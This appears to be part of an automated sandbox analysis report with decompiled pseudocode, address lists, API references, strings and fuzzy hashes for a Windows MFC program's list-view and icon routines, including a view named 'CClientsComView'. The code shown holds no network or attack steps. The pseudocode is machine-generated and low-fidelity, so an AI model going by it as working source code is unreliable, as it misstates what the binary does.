					ImageList_ReplaceIcon( *(_t106 + 0x98), _t84, LoadIconA(0x9c, 0x9c));
					L00425E44();
					_push(0x9d);
					_push(0xe);
					L00425FFA();
					ImageList_ReplaceIcon( *(_t106 + 0x98), _t84, LoadIconA(0x9d, 0x9d));
					L00425E44();
					_push(0x90);
					_push(0xe);
					L00425FFA();
					ImageList_ReplaceIcon( *(_t106 + 0x98), _t84, LoadIconA(0x90, 0x90));
					L00425E44();
					_push(0x91);
					_push(0xe);
					L00425FFA();
					ImageList_ReplaceIcon( *(_t106 + 0x98), _t84, LoadIconA(0x91, 0x91));
					L00425E44();
					_push(0x92);
					_push(0xe);
					L00425FFA();
					ImageList_ReplaceIcon( *(_t106 + 0x98), _t84, LoadIconA(0x92, 0x92));
					L00425E44();
					_push(0x93);
					_push(0xe);
					L00425FFA();
					ImageList_ReplaceIcon( *(_t106 + 0x98), _t84, LoadIconA(0x93, 0x93));
					L00425E44();
					_push(0x94);
					_push(0xe);
					L00425FFA();
					ImageList_ReplaceIcon( *(_t106 + 0x98), _t84, LoadIconA(0x94, 0x94));
					L00425E44();
					_push(0x95);
					_push(0xe);
					L00425FFA();
					ImageList_ReplaceIcon( *(_t106 + 0x98), _t84, LoadIconA(0x95, 0x95));
					L00425E44();
					_push(0x96);
					_push(0xe);
					L00425FFA();
					ImageList_ReplaceIcon( *(_t106 + 0x98), _t84, LoadIconA(0x96, 0x96));
					L00425E44();
					_push(0x97);
					_push(0xe);
					L00425FFA();
					ImageList_ReplaceIcon( *(_t106 + 0x98), _t84, LoadIconA(0x97, 0x97));
					L00425E44();
					_push(0x98);
					_push(0xe);
					L00425FFA();
					ImageList_ReplaceIcon( *(_t106 + 0x98), _t84, LoadIconA(0x98, 0x98));
					L00425E44();
					_push(0x99);
					_push(0xe);
					L00425FFA();
					ImageList_ReplaceIcon( *(_t106 + 0x98), _t84, LoadIconA(0x99, 0x99));
					_t78 = _t106 + 0x94;
					if(_t78 != 0) {
						_t78 =  *(_t78 + 4);
					}
					_push(SendMessageA( *(_t106 + 0x20), 0x1003, 1, _t78));
					L00425FF4();
					_push("CClientsComView");
					L00425FB8();
					_v212 = 1;
					_push( &_v224);
					_push(_t106);
					E00401672( &_v220);
					_v212 = _v212 & 0x00000000;
					L00425DFC();
					_v212 = _t84;
					L00425DFC();
					_t82 = 0;
				} else {
					_t82 = _t84;
				}
				 *[fs:0x0] = _v220;
				return _t82;
			}

0x00409bc5
0x00409bca
0x00409bcb
0x00409bcd
0x00409bd1
0x00409bd3
0x00409bd8
0x00409bdd
0x00409bec
0x00409bfe
0x00409c02
0x00409c08
0x00409c11
0x00409c16
0x00409c17
0x00409c1c
0x00409c1f
0x00409c23
0x00409c24
0x00409c29
0x00409c32
0x00409c37
0x00409c38
0x00409c3a
0x00409c3d
0x00409c43
0x00409c44
0x00409c45
0x00409c4a
0x00409c53
0x00409c58
0x00409c59
0x00409c5e
0x00409c61
0x00409c65
0x00409c67
0x00409c6c
0x00409c6d
0x00409c6e
0x00409c6f
0x00409c77
0x00409c79
0x00409c7e
0x00409c88
0x00409c89
0x00409c8c
0x00409ca8
0x00409caa
0x00409cb4
0x00409cb5
0x00409cb8
0x00409cc8
0x00409cca
0x00409cd4
0x00409cd5
0x00409cd8
0x00409ce8
0x00409cea
0x00409cf4
0x00409cf5
0x00409cf8
0x00409d08
0x00409d0a
0x00409d14
0x00409d15
0x00409d18
0x00409d28
0x00409d2a
0x00409d34
0x00409d35
0x00409d38
0x00409d48
0x00409d4a
0x00409d54
0x00409d55
0x00409d58
0x00409d68
0x00409d6a
0x00409d74
0x00409d75
0x00409d78
0x00409d88
0x00409d8a
0x00409d94
0x00409d95
0x00409d98
0x00409da8
0x00409daa
0x00409db4
0x00409db5
0x00409db8
0x00409dc8
0x00409dca
0x00409dd4
0x00409dd5
0x00409dd8
0x00409de8
0x00409dea
0x00409df4
0x00409df5
0x00409df8
0x00409e08
0x00409e0a
0x00409e14
0x00409e15
0x00409e18
0x00409e28
0x00409e2a
0x00409e34
0x00409e36
0x00409e36
0x00409e4a
0x00409e4b
0x00409e50
0x00409e59
0x00409e62
0x00409e67
0x00409e68
0x00409e69
0x00409e6e
0x00409e79
0x00409e82
0x00409e86
0x00409e8b
0x00409bdf
0x00409bdf
0x00409bdf
0x00409e93
0x00409e9b

APIs

_EH_prolog.MSVCRT ref: 00409BC5
#4464.MFC42(?), ref: 00409BD3
#540.MFC42(?,?,?), ref: 00409BEC
SendMessageA.USER32 ref: 00409C02
#4160.MFC42(00008053,?,?,?), ref: 00409C11
#3996.MFC42(00000000,?,00000000,00000082,?,00008053,?,?,?), ref: 00409C24
#4160.MFC42(00008062,00000000,?,00000000,00000082,?,00008053,?,?,?), ref: 00409C32
#3996.MFC42(00000001,?,00000000,00000064,?,00008062,00000000,?,00000000,00000082,?,00008053,?,?,?), ref: 00409C45
#4160.MFC42(00008054,00000001,?,00000000,00000064,?,00008062,00000000,?,00000000,00000082,?,00008053,?,?,?), ref: 00409C53
#3996.MFC42(00000002,?,00000000,000000F0,?,00008054,00000001,?,00000000,00000064,?,00008062,00000000,?,00000000,00000082), ref: 00409C67
#2096.MFC42(00000010,00000010,00000001,00000001,00000001,00000002,?,00000000,000000F0,?,00008054,00000001,?,00000000,00000064), ref: 00409C79
#1168.MFC42(00000010,00000010,00000001,00000001,00000001,00000002,?,00000000,000000F0,?,00008054,00000001,?,00000000,00000064), ref: 00409C7E
#1146.MFC42(0000009B,0000000E,0000009B,00000010,00000010,00000001,00000001,00000001,00000002,?,00000000,000000F0,?,00008054,00000001,?), ref: 00409C8C
LoadIconA.USER32(00000000,0000009B), ref: 00409C98
ImageList_ReplaceIcon.COMCTL32(?,?,00000000,?,00008054,00000001,?,00000000,00000064,?,00008062,00000000,?,00000000,00000082), ref: 00409CA8
#1168.MFC42(?,00000000,?,00008054,00000001,?,00000000,00000064,?,00008062,00000000,?,00000000,00000082,?,00008053), ref: 00409CAA
#1146.MFC42(0000009C,0000000E,0000009C,?,00000000,?,00008054,00000001,?,00000000,00000064,?,00008062,00000000,?,00000000), ref: 00409CB8
LoadIconA.USER32(00000000,0000009C), ref: 00409CBE
ImageList_ReplaceIcon.COMCTL32(?,?,00000000,?,00000000,?,00008054,00000001,?,00000000,00000064,?,00008062,00000000,?,00000000), ref: 00409CC8
#1168.MFC42(?,00000000,?,00000000,?,00008054,00000001,?,00000000,00000064,?,00008062,00000000,?,00000000,00000082), ref: 00409CCA
#1146.MFC42(0000009D,0000000E,0000009D,?,00000000,?,00000000,?,00008054,00000001,?,00000000,00000064,?,00008062,00000000), ref: 00409CD8
LoadIconA.USER32(00000000,0000009D), ref: 00409CDE
ImageList_ReplaceIcon.COMCTL32(?,?,00000000,?,00000000,?,00000000,?,00008054,00000001,?,00000000,00000064,?,00008062,00000000), ref: 00409CE8
#1168.MFC42(?,00000000,?,00000000,?,00000000,?,00008054,00000001,?,00000000,00000064,?,00008062,00000000,?), ref: 00409CEA
#1146.MFC42(00000090,0000000E,00000090,?,00000000,?,00000000,?,00000000,?,00008054,00000001,?,00000000,00000064), ref: 00409CF8
LoadIconA.USER32(00000000,00000090), ref: 00409CFE
ImageList_ReplaceIcon.COMCTL32(?,?,00000000,?,00000000,?,00000000,?,00000000,?,00008054,00000001,?,00000000,00000064), ref: 00409D08

Strings

CClientsComView, xrefs: 00409E50

Memory Dump Source

Source File: 00000000.00000002.296246322.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.296237662.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296340892.000000000042C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296349098.0000000000434000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296357716.0000000000440000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296366506.0000000000443000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296370536.0000000000444000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.296409017.0000000000446000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296413707.0000000000447000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296426801.0000000000466000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296434675.000000000046D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296518854.000000000047E000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296526512.0000000000488000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296532350.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: Icon$#1146#1168ImageList_LoadReplace$#3996#4160$#2096#4464#540H_prologMessageSend
String ID: CClientsComView
API String ID: 2633976754-3815392733
Opcode ID: 588765ef85a8950611375a99bbbcde59f352983cad1e6a8f7c615788bfadaff7
Instruction ID: 4afec2829bd8d6a290880a17bd2b607c7fc6df0094406166a8c62e87a98bc72d
Opcode Fuzzy Hash: 588765ef85a8950611375a99bbbcde59f352983cad1e6a8f7c615788bfadaff7
Instruction Fuzzy Hash: B0716DB03047587EFA20B772ED06F6B765DEF40748F41481EB54AA65E2CDBCDD448628

Uniqueness

Uniqueness Score: -1.00%

Function 00401A0F, Relevance: 101.7, APIs: 53, Strings: 5, Instructions: 245
windowCOMMON

Download Yara Rule

C-Code - Quality: 56%

			E00401A0F(void* __ecx) {
				long _t110;
				intOrPtr _t113;
				intOrPtr _t114;
				intOrPtr* _t115;
				void* _t174;
				void* _t176;
				void* _t178;
				intOrPtr _t179;

				L004269E6();
				_t179 = _t178 - 0x24c;
				_t174 = __ecx;
				 *((intOrPtr*)(_t176 - 0x10)) = _t179;
				L0042606C();
				 *(_t176 - 4) = 0;
				if(( *0x442158 & 0x00000001) == 0) {
					 *0x442158 =  *0x442158 | 0x00000001;
					L00425E08();
					E0042698C(E0040A377);
				}
				L00425E08();
				 *(_t176 - 4) = 1;
				L00425E08();
				 *(_t176 - 4) = 2;
				L00425E08();
				 *(_t176 - 4) = 3;
				L00425E08();
				 *(_t176 - 4) = 4;
				L00425E08();
				 *(_t176 - 4) = 5;
				L00425E08();
				 *(_t176 - 4) = 6;
				_t110 = SendMessageA( *(_t174 + 0x20), 0x1004, 0, 0);
				if(_t110 > 0) {
					_push(0x805b);
					L00425E02();
					_push(0x805c);
					L00425E02();
					_push(0);
					_push( *((intOrPtr*)(_t176 - 0x28)));
					_push(6);
					_push( *0x442154);
					_push( *((intOrPtr*)(_t176 - 0x2c)));
					_push(0);
					L00426066();
					 *(_t176 - 4) = 7;
					L00426060();
					if(_t110 == 1) {
						_t110 = _t176 - 0x1c;
						_push(_t110);
						L0042605A();
						_push(_t110);
						 *(_t176 - 4) = 8;
						L00426054();
						 *(_t176 - 4) = 7;
						L00425DFC();
						_push(0);
						_push(0x1001);
						_push( *0x442154);
						 *(_t176 - 4) = 9;
						L0042604E();
						 *(_t176 - 0x38) = _t110;
						if(_t110 != 0) {
							_push(0x80);
							L00425E02();
							_push(0x8052);
							L00425E02();
							_push(0x8060);
							L00425E02();
							_push( *((intOrPtr*)(_t176 - 0x20)));
							_push( *((intOrPtr*)(_t176 - 0x24)));
							_push( *((intOrPtr*)(_t176 - 0x18)));
							_push("%s - %s\n%s");
							_push(_t176 - 0x14);
							L00425FDC();
							_push( *(_t176 - 0x14));
							L00426048();
							_push(0x8053);
							L00425E02();
							_push(0x8062);
							L00425E02();
							_push(0x8054);
							L00425E02();
							_push( *((intOrPtr*)(_t176 - 0x20)));
							_push( *((intOrPtr*)(_t176 - 0x24)));
							_push( *((intOrPtr*)(_t176 - 0x18)));
							_push("%s\t\t     %s\t\t%s\n");
							_push(_t176 - 0x14);
							L00425FDC();
							_t179 = _t179 + 0x28;
							_push( *(_t176 - 0x14));
							L00426048();
							_push(0x8060);
							L00425E02();
							_push( *((intOrPtr*)(_t176 - 0x18)));
							L00426048();
							 *(_t176 - 0x1c) = 0;
							while(1) {
								_t110 = SendMessageA( *(_t174 + 0x20), 0x1004, 0, 0);
								if( *(_t176 - 0x1c) >= _t110) {
									goto L10;
								}
								_push(2);
								_t113 = _t176 - 0x34;
								_push( *(_t176 - 0x1c));
								_push(_t113);
								L00426042();
								 *((intOrPtr*)(_t176 - 0x30)) = _t113;
								_push(1);
								_t114 = _t176 - 0x40;
								_push( *(_t176 - 0x1c));
								 *(_t176 - 4) = 0xa;
								_push(_t114);
								L00426042();
								 *((intOrPtr*)(_t176 - 0x44)) = _t114;
								_push(0);
								_t115 = _t176 - 0x3c;
								_push( *(_t176 - 0x1c));
								 *(_t176 - 4) = 0xb;
								_push(_t115);
								L00426042();
								 *(_t176 - 4) = 0xc;
								_push( *((intOrPtr*)( *((intOrPtr*)(_t176 - 0x30)))));
								_push( *((intOrPtr*)( *((intOrPtr*)(_t176 - 0x44)))));
								_push( *_t115);
								_push("%s  %s\t\t%s\n");
								_push(_t176 - 0x14);
								L00425FDC();
								_t179 = _t179 + 0x14;
								 *(_t176 - 4) = 0xb;
								L00425DFC();
								 *(_t176 - 4) = 0xa;
								L00425DFC();
								 *(_t176 - 4) = 9;
								L00425DFC();
								_push( *(_t176 - 0x14));
								L00426048();
								 *(_t176 - 0x1c) =  *(_t176 - 0x1c) + 1;
							}
						}
						L10:
						 *(_t176 - 4) = 7;
						if( *(_t176 - 0x38) == 0) {
							_push(0x805d);
							L00425E02();
							_push( *0x442154);
							_t110 = _t176 - 0x14;
							_push( *((intOrPtr*)(_t176 - 0x18)));
							_push(_t110);
							L00425FDC();
							_push(0);
							_push(0x10);
							_push( *(_t176 - 0x14));
							L00426030();
						} else {
							L00426036();
						}
					}
					 *(_t176 - 4) = 0xe;
					L00425DFC();
					 *(_t176 - 4) = 6;
					L0042602A();
				} else {
					_push(0xffffffff);
					_push(0);
					_push(0x8061);
					L00425E56();
				}
				 *(_t176 - 4) = 5;
				L00425DFC();
				 *(_t176 - 4) = 4;
				L00425DFC();
				 *(_t176 - 4) = 3;
				L00425DFC();
				 *(_t176 - 4) = 2;
				L00425DFC();
				 *(_t176 - 4) = 1;
				L00425DFC();
				 *(_t176 - 4) = 0;
				L00425DFC();
				 *(_t176 - 4) =  *(_t176 - 4) | 0xffffffff;
				L00426024();
				 *[fs:0x0] =  *((intOrPtr*)(_t176 - 0xc));
				return _t110;
			}

0x00409ff8
0x00409ffd
0x0040a005
0x0040a00b
0x0040a00e
0x0040a01c
0x0040a01f
0x0040a021
0x0040a02d
0x0040a037
0x0040a03c
0x0040a040
0x0040a048
0x0040a04c
0x0040a054
0x0040a058
0x0040a060
0x0040a064
0x0040a06c
0x0040a070
0x0040a078
0x0040a07c
0x0040a091
0x0040a095
0x0040a099
0x0040a0ad
0x0040a0b5
0x0040a0ba
0x0040a0c2
0x0040a0c7
0x0040a0ce
0x0040a0d1
0x0040a0d3
0x0040a0d9
0x0040a0dc
0x0040a0dd
0x0040a0e8
0x0040a0ec
0x0040a0f4
0x0040a0fa
0x0040a103
0x0040a104
0x0040a109
0x0040a10f
0x0040a113
0x0040a11b
0x0040a11f
0x0040a124
0x0040a125
0x0040a12a
0x0040a133
0x0040a137
0x0040a13e
0x0040a141
0x0040a147
0x0040a14f
0x0040a154
0x0040a15c
0x0040a161
0x0040a169
0x0040a16e
0x0040a174
0x0040a177
0x0040a17a
0x0040a17f
0x0040a180
0x0040a18b
0x0040a18e
0x0040a193
0x0040a19b
0x0040a1a0
0x0040a1a8
0x0040a1ad
0x0040a1b5
0x0040a1ba
0x0040a1c0
0x0040a1c3
0x0040a1c6
0x0040a1cb
0x0040a1cc
0x0040a1d1
0x0040a1d7
0x0040a1da
0x0040a1df
0x0040a1e7
0x0040a1ec
0x0040a1f2
0x0040a1f7
0x0040a1fa
0x0040a204
0x0040a209
0x00000000
0x00000000
0x0040a20f
0x0040a211
0x0040a214
0x0040a219
0x0040a21a
0x0040a21f
0x0040a222
0x0040a224
0x0040a227
0x0040a22c
0x0040a230
0x0040a231
0x0040a236
0x0040a239
0x0040a23a
0x0040a23d
0x0040a242
0x0040a246
0x0040a247
0x0040a24f
0x0040a253
0x0040a258
0x0040a25a
0x0040a25f
0x0040a264
0x0040a265
0x0040a26a
0x0040a270
0x0040a274
0x0040a27c
0x0040a280
0x0040a288
0x0040a28c
0x0040a291
0x0040a297
0x0040a29c
0x0040a29c
0x0040a1fa
0x0040a2b4
0x0040a2b7
0x0040a2be
0x0040a2ca
0x0040a2d2
0x0040a2d7
0x0040a2dd
0x0040a2e0
0x0040a2e3
0x0040a2e4
0x0040a2ec
0x0040a2ed
0x0040a2ef
0x0040a2f2
0x0040a2c0
0x0040a2c3
0x0040a2c3
0x0040a2be
0x0040a2fd
0x0040a301
0x0040a30c
0x0040a310
0x0040a09b
0x0040a09b
0x0040a09d
0x0040a09e
0x0040a0a3
0x0040a0a3
0x0040a318
0x0040a31c
0x0040a324
0x0040a328
0x0040a330
0x0040a334
0x0040a33c
0x0040a340
0x0040a348
0x0040a34c
0x0040a354
0x0040a357
0x0040a35c
0x0040a363
0x0040a36d
0x0040a376

APIs

_EH_prolog.MSVCRT ref: 00409FF8
#533.MFC42 ref: 0040A00E
#540.MFC42 ref: 0040A02D
#540.MFC42 ref: 0040A040
#540.MFC42 ref: 0040A04C
#540.MFC42 ref: 0040A058
#540.MFC42 ref: 0040A064
#540.MFC42 ref: 0040A070
#540.MFC42 ref: 0040A07C
SendMessageA.USER32 ref: 0040A095
#1199.MFC42(00008061,00000000,000000FF), ref: 0040A0A3
#4160.MFC42(0000805B), ref: 0040A0B5
#4160.MFC42(0000805C,0000805B), ref: 0040A0C2
#355.MFC42(00000000,?,00000006,?,00000000,0000805C,0000805B), ref: 0040A0DD
#2515.MFC42(00000000,?,00000006,?,00000000,0000805C,0000805B), ref: 0040A0EC
#3499.MFC42(?,00000000,?,00000006,?,00000000,0000805C,0000805B), ref: 0040A104
#858.MFC42(00000000,?,00000000,?,00000006,?,00000000,0000805C,0000805B), ref: 0040A113
#800.MFC42(00000000,?,00000000,?,00000006,?,00000000,0000805C,0000805B), ref: 0040A11F
#5194.MFC42(00001001,00000000,00000000,?,00000000,?,00000006,?,00000000,0000805C,0000805B), ref: 0040A137
#4160.MFC42(00000080,00001001,00000000,00000000,?,00000000,?,00000006,?,00000000,0000805C,0000805B), ref: 0040A14F
#4160.MFC42(00008052,00000080,00001001,00000000,00000000,?,00000000,?,00000006,?,00000000,0000805C,0000805B), ref: 0040A15C
#4160.MFC42(00008060,00008052,00000080,00001001,00000000,00000000,?,00000000,?,00000006,?,00000000,0000805C,0000805B), ref: 0040A169
#2818.MFC42(?,%s - %s%s,?,?,?,00008060,00008052,00000080,00001001,00000000,00000000,?,00000000,?,00000006,?), ref: 0040A180
#6407.MFC42(?,0000805C,0000805B), ref: 0040A18E
#4160.MFC42(00008053,?,0000805C,0000805B), ref: 0040A19B
#4160.MFC42(00008062,00008053,?,0000805C,0000805B), ref: 0040A1A8
#4160.MFC42(00008054,00008062,00008053,?,0000805C,0000805B), ref: 0040A1B5
#2818.MFC42(?,%s %s%s,?,?,?,00008054,00008062,00008053,?,0000805C,0000805B), ref: 0040A1CC
#6407.MFC42(?,?,00008054,00008062,00008053,?,0000805C,0000805B), ref: 0040A1DA
#4160.MFC42(00008060,?,?,00008054,00008062,00008053,?,0000805C,0000805B), ref: 0040A1E7
#6407.MFC42(?,00008060,?,?,00008054,00008062,00008053,?,0000805C,0000805B), ref: 0040A1F2
SendMessageA.USER32 ref: 0040A204
#3301.MFC42(?,?,00000002,?,00008054,00008062,00008053,?,0000805C,0000805B), ref: 0040A21A
#3301.MFC42(?,?,00000001,?,?,00000002,?,00008054,00008062,00008053,?,0000805C,0000805B), ref: 0040A231
#3301.MFC42(?,?,00000000,?,?,00000001,?,?,00000002,?,00008054,00008062,00008053,?,0000805C,0000805B), ref: 0040A247
#2818.MFC42(?,%s %s%s,00000000,?,?,?,?,00000000,?,?,00000001,?,?,00000002,?,00008054), ref: 0040A265
#800.MFC42(?,00000001,?,?,00000002,?,00008054,00008062,00008053,?,0000805C,0000805B), ref: 0040A274
#800.MFC42(?,00000001,?,?,00000002,?,00008054,00008062,00008053,?,0000805C,0000805B), ref: 0040A280
#800.MFC42(?,00000001,?,?,00000002,?,00008054,00008062,00008053,?,0000805C,0000805B), ref: 0040A28C
#6407.MFC42(?,?,00000001,?,?,00000002,?,00008054,00008062,00008053,?,0000805C,0000805B), ref: 0040A297
#1997.MFC42(00001001,00000000,00000000,?,00000000,?,00000006,?,00000000,0000805C,0000805B), ref: 0040A2C3
#4160.MFC42(0000805D,00001001,00000000,00000000,?,00000000,?,00000006,?,00000000,0000805C,0000805B), ref: 0040A2D2
#2818.MFC42(?,?,0000805D,00001001,00000000,00000000,?,00000000,?,00000006,?,00000000,0000805C,0000805B), ref: 0040A2E4
#1200.MFC42(?,00000010,00000000), ref: 0040A2F2
#800.MFC42(00000000,?,00000006,?,00000000,0000805C,0000805B), ref: 0040A301
#641.MFC42(00000000,?,00000006,?,00000000,0000805C,0000805B), ref: 0040A310
#800.MFC42(00000000,?,00000006,?,00000000,0000805C,0000805B), ref: 0040A31C
#800.MFC42(00000000,?,00000006,?,00000000,0000805C,0000805B), ref: 0040A328
#800.MFC42(00000000,?,00000006,?,00000000,0000805C,0000805B), ref: 0040A334
#800.MFC42(00000000,?,00000006,?,00000000,0000805C,0000805B), ref: 0040A340
#800.MFC42(00000000,?,00000006,?,00000000,0000805C,0000805B), ref: 0040A34C
#800.MFC42(00000000,?,00000006,?,00000000,0000805C,0000805B), ref: 0040A357
#798.MFC42(00000000,?,00000006,?,00000000,0000805C,0000805B), ref: 0040A363

Strings

T!D, xrefs: 0040A10A
%s %s%s, xrefs: 0040A1C6
%s %s%s, xrefs: 0040A25F
%s - %s%s, xrefs: 0040A17A
T!D, xrefs: 0040A028

Memory Dump Source

Source File: 00000000.00000002.296246322.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.296237662.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296340892.000000000042C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296349098.0000000000434000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296357716.0000000000440000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296366506.0000000000443000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296370536.0000000000444000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.296409017.0000000000446000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296413707.0000000000447000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296426801.0000000000466000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296434675.000000000046D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296518854.000000000047E000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296526512.0000000000488000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296532350.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: #800$#4160$#540$#2818#6407$#3301$MessageSend$#1199#1200#1997#2515#3499#355#5194#533#641#798#858H_prolog
String ID: %s %s%s$%s %s%s$%s - %s%s$T!D$T!D
API String ID: 2171470616-3261606579
Opcode ID: 7867c97ecfdc2faffe46daa874a4d7b416bf463edf9dd71e6006b00cccfd30ce
Instruction ID: c22a547f51076319b61e2b5fe80a29a0226efca3e1fe1278e8d2bd401aa87f67
Opcode Fuzzy Hash: 7867c97ecfdc2faffe46daa874a4d7b416bf463edf9dd71e6006b00cccfd30ce
Instruction Fuzzy Hash: 40A1A230E00659EEDF01EBE1D946AEDBB74AF14308F90405EF501322D2DBB91B59DB66

Uniqueness

Uniqueness Score: -1.00%

Function 00401F37, Relevance: 101.7, APIs: 53, Strings: 5, Instructions: 245
windowCOMMON

Download Yara Rule

C-Code - Quality: 56%

			E00401F37(void* __ecx) {
				long _t110;
				intOrPtr _t113;
				intOrPtr _t114;
				intOrPtr* _t115;
				void* _t174;
				void* _t176;
				void* _t178;
				intOrPtr _t179;

				L004269E6();
				_t179 = _t178 - 0x24c;
				_t174 = __ecx;
				 *((intOrPtr*)(_t176 - 0x10)) = _t179;
				L0042606C();
				 *(_t176 - 4) = 0;
				if(( *0x442150 & 0x00000001) == 0) {
					 *0x442150 =  *0x442150 | 0x00000001;
					L00425E08();
					E0042698C(E0040914F);
				}
				L00425E08();
				 *(_t176 - 4) = 1;
				L00425E08();
				 *(_t176 - 4) = 2;
				L00425E08();
				 *(_t176 - 4) = 3;
				L00425E08();
				 *(_t176 - 4) = 4;
				L00425E08();
				 *(_t176 - 4) = 5;
				L00425E08();
				 *(_t176 - 4) = 6;
				_t110 = SendMessageA( *(_t174 + 0x20), 0x1004, 0, 0);
				if(_t110 > 0) {
					_push(0x805b);
					L00425E02();
					_push(0x805c);
					L00425E02();
					_push(0);
					_push( *((intOrPtr*)(_t176 - 0x28)));
					_push(6);
					_push( *0x44214c);
					_push( *((intOrPtr*)(_t176 - 0x2c)));
					_push(0);
					L00426066();
					 *(_t176 - 4) = 7;
					L00426060();
					if(_t110 == 1) {
						_t110 = _t176 - 0x1c;
						_push(_t110);
						L0042605A();
						_push(_t110);
						 *(_t176 - 4) = 8;
						L00426054();
						 *(_t176 - 4) = 7;
						L00425DFC();
						_push(0);
						_push(0x1001);
						_push( *0x44214c);
						 *(_t176 - 4) = 9;
						L0042604E();
						 *(_t176 - 0x38) = _t110;
						if(_t110 != 0) {
							_push(0x80);
							L00425E02();
							_push(0x8073);
							L00425E02();
							_push(0x8060);
							L00425E02();
							_push( *((intOrPtr*)(_t176 - 0x20)));
							_push( *((intOrPtr*)(_t176 - 0x24)));
							_push( *((intOrPtr*)(_t176 - 0x18)));
							_push("%s - %s\n%s");
							_push(_t176 - 0x14);
							L00425FDC();
							_push( *(_t176 - 0x14));
							L00426048();
							_push(0x8053);
							L00425E02();
							_push(0x8062);
							L00425E02();
							_push(0x8054);
							L00425E02();
							_push( *((intOrPtr*)(_t176 - 0x20)));
							_push( *((intOrPtr*)(_t176 - 0x24)));
							_push( *((intOrPtr*)(_t176 - 0x18)));
							_push("%s\t\t     %s\t\t%s\n");
							_push(_t176 - 0x14);
							L00425FDC();
							_t179 = _t179 + 0x28;
							_push( *(_t176 - 0x14));
							L00426048();
							_push(0x8060);
							L00425E02();
							_push( *((intOrPtr*)(_t176 - 0x18)));
							L00426048();
							 *(_t176 - 0x1c) = 0;
							while(1) {
								_t110 = SendMessageA( *(_t174 + 0x20), 0x1004, 0, 0);
								if( *(_t176 - 0x1c) >= _t110) {
									goto L10;
								}
								_push(2);
								_t113 = _t176 - 0x34;
								_push( *(_t176 - 0x1c));
								_push(_t113);
								L00426042();
								 *((intOrPtr*)(_t176 - 0x30)) = _t113;
								_push(1);
								_t114 = _t176 - 0x40;
								_push( *(_t176 - 0x1c));
								 *(_t176 - 4) = 0xa;
								_push(_t114);
								L00426042();
								 *((intOrPtr*)(_t176 - 0x44)) = _t114;
								_push(0);
								_t115 = _t176 - 0x3c;
								_push( *(_t176 - 0x1c));
								 *(_t176 - 4) = 0xb;
								_push(_t115);
								L00426042();
								 *(_t176 - 4) = 0xc;
								_push( *((intOrPtr*)( *((intOrPtr*)(_t176 - 0x30)))));
								_push( *((intOrPtr*)( *((intOrPtr*)(_t176 - 0x44)))));
								_push( *_t115);
								_push("%s  %s\t\t%s\n");
								_push(_t176 - 0x14);
								L00425FDC();
								_t179 = _t179 + 0x14;
								 *(_t176 - 4) = 0xb;
								L00425DFC();
								 *(_t176 - 4) = 0xa;
								L00425DFC();
								 *(_t176 - 4) = 9;
								L00425DFC();
								_push( *(_t176 - 0x14));
								L00426048();
								 *(_t176 - 0x1c) =  *(_t176 - 0x1c) + 1;
							}
						}
						L10:
						 *(_t176 - 4) = 7;
						if( *(_t176 - 0x38) == 0) {
							_push(0x805d);
							L00425E02();
							_push( *0x44214c);
							_t110 = _t176 - 0x14;
							_push( *((intOrPtr*)(_t176 - 0x18)));
							_push(_t110);
							L00425FDC();
							_push(0);
							_push(0x10);
							_push( *(_t176 - 0x14));
							L00426030();
						} else {
							L00426036();
						}
					}
					 *(_t176 - 4) = 0xe;
					L00425DFC();
					 *(_t176 - 4) = 6;
					L0042602A();
				} else {
					_push(0xffffffff);
					_push(0);
					_push(0x8061);
					L00425E56();
				}
				 *(_t176 - 4) = 5;
				L00425DFC();
				 *(_t176 - 4) = 4;
				L00425DFC();
				 *(_t176 - 4) = 3;
				L00425DFC();
				 *(_t176 - 4) = 2;
				L00425DFC();
				 *(_t176 - 4) = 1;
				L00425DFC();
				 *(_t176 - 4) = 0;
				L00425DFC();
				 *(_t176 - 4) =  *(_t176 - 4) | 0xffffffff;
				L00426024();
				 *[fs:0x0] =  *((intOrPtr*)(_t176 - 0xc));
				return _t110;
			}

0x00408dd0
0x00408dd5
0x00408ddd
0x00408de3
0x00408de6
0x00408df4
0x00408df7
0x00408df9
0x00408e05
0x00408e0f
0x00408e14
0x00408e18
0x00408e20
0x00408e24
0x00408e2c
0x00408e30
0x00408e38
0x00408e3c
0x00408e44
0x00408e48
0x00408e50
0x00408e54
0x00408e69
0x00408e6d
0x00408e71
0x00408e85
0x00408e8d
0x00408e92
0x00408e9a
0x00408e9f
0x00408ea6
0x00408ea9
0x00408eab
0x00408eb1
0x00408eb4
0x00408eb5
0x00408ec0
0x00408ec4
0x00408ecc
0x00408ed2
0x00408edb
0x00408edc
0x00408ee1
0x00408ee7
0x00408eeb
0x00408ef3
0x00408ef7
0x00408efc
0x00408efd
0x00408f02
0x00408f0b
0x00408f0f
0x00408f16
0x00408f19
0x00408f1f
0x00408f27
0x00408f2c
0x00408f34
0x00408f39
0x00408f41
0x00408f46
0x00408f4c
0x00408f4f
0x00408f52
0x00408f57
0x00408f58
